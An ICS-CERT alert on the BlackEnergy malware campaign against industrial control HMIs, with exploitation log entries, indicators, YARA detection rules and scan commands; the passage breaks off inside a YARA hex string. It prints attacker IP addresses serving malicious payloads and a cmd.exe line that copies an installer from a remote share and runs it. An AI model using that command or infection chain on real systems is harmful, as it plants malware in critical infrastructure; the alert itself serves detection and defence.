**HOME** **ABOUT** **ICSJWG** **INFORMATION** **PRODUCTS** **TRAINING** **FAQ** **Control Systems** **Home** **Calendar** **ICSJWG** **Information Products** **Training** **Recommended Practices** **Assessments** **Standards & References** **Related Sites** **FAQ** # Alert (ICS-ALERT-14-281-01C) More Alerts ## Ongoing Sophisticated Malware Campaign Compromising ICS (Update C) **Original release date: December 10, 2014 | Last revised: January 26, 2016** ##### Legal Notice **[All information products included in http://ics-cert.us-cert.gov are provided "as is" for informational purposes only. The](http://ics-cert.us-cert.gov)** **Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information** **contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise.** **Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more** **[information about TLP, see http://www.us-cert.gov/tlp/.](http://www.us-cert.gov/tlp/)** #### SUMMARY **This alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-281-01B Ongoing** **Sophisticated Malware Campaign Compromising ICS that was published December 10, 2014, on the ICS-CERT web site.** **ICS-CERT has identified a sophisticated malware campaign that has compromised numerous industrial control systems** **(ICSs) environments using a variant of the BlackEnergy malware. Analysis indicates that this campaign has been ongoing** **since at least 2011. Multiple companies working with ICS-CERT have identified the malware on Internet-connected** **human-machine interfaces (HMIs).** ##### --------- Begin Update C Part 1 of 2 ------- **Recent open-source reports have circulated alleging that a December 23, 2015, power outage in Ukraine was caused by** **BlackEnergy Malware. ICS-CERT and US-CERT are working with the Ukrainian CERT and our international partners to** **analyze the malware and can confirm that a BlackEnergy 3 variant was present in the system. Based on the technical** **artifacts ICS-CERT and US-CERT have been provided, we cannot confirm a causal link between the power outage with** **the presence of the malware. However, we continue to support CERT-UA on this issue. The YARA signature included with** **the original posting of this alert has been shown to identify a majority of the samples seen as of this update and continues** **to be the best method for detecting BlackEnergy infections.** **While there are many open source reports of BE3, this is the first opportunity ICS-CERT has been able to provide results** **of malware analysis. In a departure from the ICS product vulnerabilities used to deliver the BE2 malware, in this case the** **infection vector appears to have been spear phishing via a malicious Microsoft Office (MS Word) attachment. ICS-CERT** **and US-CERT analysis and support are ongoing, and additional technical analysis will be made available on the US-** **CERT Secure Portal.** ##### --------- End Update C Part 1 of 2 ------- **ICS-CERT originally published information and technical indicators about this campaign in a** **[TLP Amber](https://www.us-cert.gov/tlp/)** **alert (ICS-** **ALERT-14-281-01P) that was released to the US-CERT secure portal on October 8, 2014, and updated on Decembera** **[10, 2014. US critical infrastructure asset owners and operators can request access to this information by emailing ics-](mailto:ics-cert@hq.dhs.gov)** **cert@hq.dhs.gov** **.** #### DETAILS **ICS-CERT has determined that users of HMI products from various vendors have been targeted in this campaign,** **including GE Cimplicity, Advantech/Broadwin WebAccess, and Siemens WinCC. It is currently unknown whether other** **vendor’s products have also been targeted. ICS-CERT is working with the involved vendors to evaluate this activity and** **also notify their users of the linkages to this campaign.** **At this time, ICS-CERT has not identified any attempts to damage, modify, or otherwise disrupt the victim systems’ control** **processes. ICS-CERT has not been able to verify if the intruders expanded access beyond the compromised HMI into the** **remainder of the underlying control system. However, typical malware deployments have included modules that search** **out any network-connected file shares and removable media for additional lateral movement within the affected** **environment. The malware is highly modular and not all functionality is deployed to all victims.** **In addition, public reports reference a BlackEnergy-based campaign against a variety of overseas targets leveragingb c** **vulnerability CVE-2014-4114 (affecting Microsoft Windows and Windows Server 2008 and 2012). ICS-CERT has notd** **observed the use of this vulnerability to target control system environments. However, analysis of the technical findings in** **the two report shows linkages in the shared command and control infrastructure between the campaigns, suggesting both** **are part of a broader campaign by the same threat actor.** **ICS-CERT strongly encourages asset owners and operators to look for signs of compromise within their control systems** **environments. Any positive or suspected findings should be immediately reported to ICS-CERT for further analysis and** **correlation** ----- **direct connection to the Internet. Analysis of victim system artifacts has determined that the actors have been exploiting a** **[vulnerability in GE’s Cimplicity HMI product since at least January 2012. The vulnerability, CVE-2014-0751, was](http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0751)** **[published in ICS-CERT advisory ICSA-14-023-01 on January 23, 2014. Guidance for remediation was published to the](https://ics-cert.us-cert.gov/advisories/ICSA-14-023-01)** **GE IP portal in December 2013. GE has also released a statement about this campaign on the GE security web site.e** **f** **Using this vulnerability, attackers were able to have the HMI server execute a malicious .cim file [Cimplicity screen file]** **hosted on an attacker-controlled server.** **Date Request Type Requestor IP Screen Served** **1/17/2012 7:16 Start //212.124.110.146/testshare/payload.cim** **9/9/2013 1:49 Start //46.165.250.32/incoming/devlist.cim** **9/10/2014 3:59 Start \\94.185.85.122\public\config.bak** **Figure 1. Log entries showing execution of remote .cim file.** **ICS-CERT has analyzed two different .cim files used in this campaign: devlist.cim and config.bak. Both files use scripts to** **ultimately install the BlackEnergy malware.** **devlist.cim: This file uses an embedded script that is executed as soon as the file is opened using the Screen Open** **event. The obfuscated script downloads the file “newsfeed.xml” from the same remote server, which it saves in the** **Cimplicity directory using the name <41 character string>.wsf. The name is randomly generated using upper and** **lower case letters, numbers, and hyphens. The .wsf script is then executed using the Windows command-based script** **host (cscript.exe). The new script downloads the file “category.xml,” which it saves in the Cimplicity directory using the** **name “CimWrapPNPS.exe.” CimWrapPNPS.exe is a BlackEnergy installer that deletes itself once the malware is** **installed.** **config.bak: This file uses a script that is executed when the file is opened using the OnOpenExecCommand event.** **The script downloads a BlackEnergy installer from a remote server, names it “CimCMSafegs.exe,” copies it into the** **Cimplicity directory, and then executes it. The CimCMSafegs.exe file is a BlackEnergy installer that deletes itself after** **the malware is installed.** **cmd.exe /c “copy \\94[dot]185[dot]85[dot]122\public\default.txt “%CIMPATH%\CimCMSafegs.exe” && start** **“WOW64” “%CIMPATH”\CimCMSafegs.exe”** **Figure 2. Script executed by malicious config.bak file.** **Analysis suggests that the actors likely used automated tools to discover and compromise vulnerable systems. ICS-CERT** **is concerned that any companies that have been running Cimplicity since 2012 with their HMI directly connected to the** **Internet could be infected with BlackEnergy malware. ICS-CERT strongly recommends that companies use the indicators** **and Yara signature in this alert to check their systems. In addition, we recommend that all Cimplicity users review ICS-** **[CERT advisory ICSA-14-023-01 and apply the recommended mitigations.](https://ics-cert.us-cert.gov/advisories/ICSA-14-023-01)** ##### WINCC **While ICS-CERT lacks definitive information on how WinCC systems are being compromised by BlackEnergy, there are** **indications that one of the vulnerabilities fixed with the latest update for SIMATIC WinCC may have been exploited by the** **BlackEnergy malware. ICS-CERT strongly encourages users of WinCC, TIA Portal, and PCS7 to update their software tog** **[the most recent version as soon as possible. Please see Siemens Security Advisory SSA-134508](http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-134508.pdf)** **and and ICS-CERT** **[advisory ICSA-14-329-02D for additional details.](https://ics-cert.us-cert.gov/advisories/ICSA-14-329-02D)** ##### ADVANTECH/BROADWIN WEBACCESS **A number of the victims associated with this campaign were running the Advantech/BroadWin WebAccess software with** **a direct Internet connection. We have not yet identified the initial infection vector for victims running this platform but** **believe it is being targeted.** #### DETECTION ##### YARA SIGNATURE --------- Begin Update C Part 2 of 2 ------- **ICS-CERT has published instruction for how to use the YARA signature for typical information technology environments.** **ICS-CERT recommends a phased approach to utilize this YARA signature in an industrial control systems (ICSs)** **environment. Test the use of the signature in the test/quality assurance/development ICS environment if one exists. If not,** **deploy the signature against backup or alternate systems in the top end of the ICS environment; this signature will not be** **usable on the majority of field devices.** ##### --------- End Update C Part 2 of 2 ------- **ICS-CERT has produced a Yara signature to aid in identifying if the malware files are present on a given system. This** **signature is provided “as is” and has not been fully tested for all variations or environments. Any positive or suspected** **findings should be immediately reported to ICS-CERT for further analysis and correlation. The Yara signature is available** **at:** **/sites/default/files/file_attach/ICS-ALERT-14-281-01.yara** **YARA is a pattern-matching tool used to by computer security researchers and companies to help identify malware. You** **[can find usage help and download links on the main Yara page at http://plusvic.github.io/yara/](http://plusvic.github.io/yara/)** **. For use on a Windows** **machine, you can download the precompiled binaries at:** ----- **Yara version 3.1.0 32-bit** **yara32.exe:** **MD5 - fddd3831d7026c81cbd189ac567421ab** **SHA256 - 865992534620d38b988df10a79a39bb12519f44aee8a56233a58cfb54a48c895** **yarac32.exe:** **MD5 - 87273afb970743c7eee001a3ec6a71cd** **SHA256 - 94ece384cded7e35ca8d600deeea7d59776098f4e459ddab5a94b1f470e59174** **Yara version 3.1.0 64-bit** **yara64.exe:** **MD5 - 105c05f8d789e85c36dd845b5fbb323e** **SHA256 - 77c657dacac4d737c3791d284ea8c750ff7fffe88d47397e049586a1980710be** **yarac64.exe:** **MD5 - c9b79b1a4cf4fb9a31391a1c15bed6d6** **SHA256 - 7bfcbafc1b814be1ec337fd653289c073913140325685119445afa471e65eb94** **Once downloaded, extract the zip archive to the computer where you need to run the signatures and copy the ICS-CERT** **Yara rule into the same folder. For a comprehensive search (which will take a number of hours, depending on the** **system), use the following command:** **yara32.exe -r -s ICS-ALERT-14-281-01.yara C: >> yara_results.txt** **For a quicker search, use the following:** **(for Windows Vista and later)** **yara32.exe -r -s ICS-ALERT-14-281-01.yara C:\Windows >> yara_results.txt** **yara32.exe -r -s ICS-ALERT-14-281-01.yara C:\Users >> yara_results.txt** **(for Windows XP or earlier)** **yara32.exe -r -s ICS-ALERT-14-281-01.yara C:\Windows >> yara_results.txt** **yara32.exe -r -s ICS-ALERT-14-281-01.yara "C:\Documents and Settings" >> yara_results.txt** **These commands will create a text file named “Yara_results.txt” in the same folder as the rule and Yara executable. If the** **search returns hits, you can send this file to ICS-CERT, and ICS-CERT will verify if your system is compromised by** **BlackEnergy.** **//ICS-CERT BlackEnergy Yara rules from ICS-ALERT-14-281-01** **rule BlackEnergy2** **//ICS-CERT rule to BlackEnergy2 versions 5.0.0 through 7.1.2 (full) and versions 10.0.0 through 11.1.0 (light)** **//version 3** **{** **strings:** **$a1 = "Adobe Flash Player Installer" wide nocase** **$a3 = "regedt32.exe" wide nocase** **$a4 = "WindowsSysUtility" wide nocase** **$a6 = "USB MDM Driver" wide nocase** **$b1 = {00 05 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 3F 00 00 00** **00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5C 04 00 00 01 00 53 00 74 00 72 00 69 00** **6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 1C 02 00 00 01 00 30 00 30 00 31 00 35 00 30 00** **34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00** ----- **2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00** **61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00** **68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00** **67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 64 00** **6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00** **6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 00 6F 00** **77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00** **00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00** **00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 1C 02 00 00 01 00 30 00** **34 00 30 00 39 00 30 00 34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00** **61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00** **6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 46 00 0F 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00** **72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 00 72 00** **69 00 76 00 65 00 72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00** **6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 4A 00 13 00** **01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00** **79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01** **00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73** **00 62 00 6D 00 64 00 6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63** **00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69** **00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73** **00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73** **00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 48** **00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 28 00 08 00 00 00 54** **00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 15 00 B0 04 09 04 B0 04}** **$b2 = {34 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 03 00 03 00 04 00 02 00 03 00 03 00 04 00 02 00 3F 00 00 00** **00 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 02 00 00 00 00 53 00 74 00 72 00 69 00 6E** **00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 70 02 00 00 00 00 30 00 34 00 30 00 39 00 30 00 34** **00 65 00 34 00 00 00 4A 00 15 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00** **00 53 00 6F 00 6C 00 69 00 64 00 20 00 53 00 74 00 61 00 74 00 65 00 20 00 4E 00 65 00 74 00 77 00 6F 00 72 00 6B** **00 73 00 00 00 00 00 62 00 1D 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69** **00 6F 00 6E 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 6C 00 61** **00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 00 30 00 08 00 01 00 46** **00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34** **00 00 00 32 00 09 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 68 00 6F** **00 73 00 74 00 2E 00 65 00 78 00 65 00 00 00 00 00 76 00 29 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70** **00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00** **29 00 20 00 41 00 64 00 6F 00 62 00 65 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 73 00 20 00 49 00 6E 00 63 00** **6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 65 00 64 00 00 00 00 00 3A 00 09 00 01 00 4F 00 72 00 69 00 67 00 69 00** **6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 73 00 74 00 2E 00 65 00 78 00** **65 00 00 00 00 00 5A 00 1D 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00** **41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 6C 00 61 00 79 00 65 00 72 00 20 00** **49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 00 34 00 08 00 01 00 50 00 72 00 6F 00 64 00 75 00** **63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 44 00** **00 00 00 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00** **72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04 46 45 32 58}** **$b3 = {C8 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 17 00 00 00** **00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 01 00 53 00 74 00 72 00 69 00 6E** **00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 04 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34** **00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00** **00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69** **00 6F 00 6E 00 00 00 48 00 10 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69** **00 6F 00 6E 00 00 00 00 00 49 00 44 00 45 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69 00 76 00 65 00 72** **00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E** **00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 78 00 70 00 73 00 70 00 2E 00 30** **00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67** **00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67** **00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 39 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00** **64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00** **20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00** **53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00** **65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00** **32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00** **04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04}** **$b4 = {9C 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 06 00 01 40 B0 1D 01 00 06 00 01 40 B0 1D 3F 00 00 00** **00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FA 02 00 00 01 00 53 00 74 00 72 00 69 00 6E** **00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 D6 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34** **00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00** **00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69** **00 6F 00 6E 00 00 00 58 00 18 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69** **00 6F 00 6E 00 00 00 00 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6F 00 72** **00 20 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 00 00 6C 00 26 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72** **00 73 00 69 00 6F 00 6E 00 00 00 00 00 36 00 2E 00 31 00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38** **00 35 00 20 00 28 00 77 00 69 00 6E 00 37 00 5F 00 72 00 74 00 6D 00 2E 00 30 00 39 00 30 00 37 00 31 00 33 00 2D** **00 31 00 32 00 35 00 35 00 29 00 00 00 3A 00 0D 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61** **00 6D 00 65 00 00 00 72 00 65 00 67 00 65 00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 80 00 2E** **00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D** **00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F** ----- **00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F** **00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 42 00 0F** **00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 36 00 2E 00 31** **00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00** **46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00** **61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04}** **$b5 = {78 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 00 00 05 00 6A 44 B1 1D 00 00 05 00 6A 44 B1 1D 3F 00 00 00** **00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D6 02 00 00 01 00 53 00 74 00 72 00 69 00** **6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 B2 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00** **34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00** **00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00** **69 00 6F 00 6E 00 00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00** **69 00 6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 53 00 79 00 73 00 55 00 74 00 69 00** **6C 00 69 00 74 00 79 00 00 00 00 00 72 00 29 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00** **6E 00 00 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 20 00 28 00** **77 00 69 00 6E 00 37 00 73 00 70 00 31 00 5F 00 72 00 74 00 6D 00 2E 00 31 00 30 00 31 00 31 00 31 00 39 00 2D 00** **31 00 38 00 35 00 30 00 29 00 00 00 00 00 30 00 08 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00** **61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00** **6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00** **6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 00 41 00 6C 00** **6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 76 00 65 00 64 00 2E 00 00 00** **40 00 0C 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00** **00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 2E 00 65 00 78 00 65 00 00 00 58 00 1C 00 01 00 50 00 72 00 6F 00** **64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 53 00 79 00** **73 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 20 00 2D 00 20 00 55 00 6E 00 69 00 63 00 6F 00 64 00 65 00 00 00** **42 00 0F 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00** **2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 00 00 00 00 44 00 00 00 01 00 56 00** **61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00** **73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04}** **$b6 = {D4 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 17 00 00 00** **00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 02 00 00 01 00 53 00 74 00 72 00 69 00 6E** **00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 10 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34** **00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00** **00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69** **00 6F 00 6E 00 00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69** **00 6F 00 6E 00 00 00 00 00 53 00 65 00 72 00 69 00 61 00 6C 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69** **00 76 00 65 00 72 00 00 00 00 00 62 00 21 00 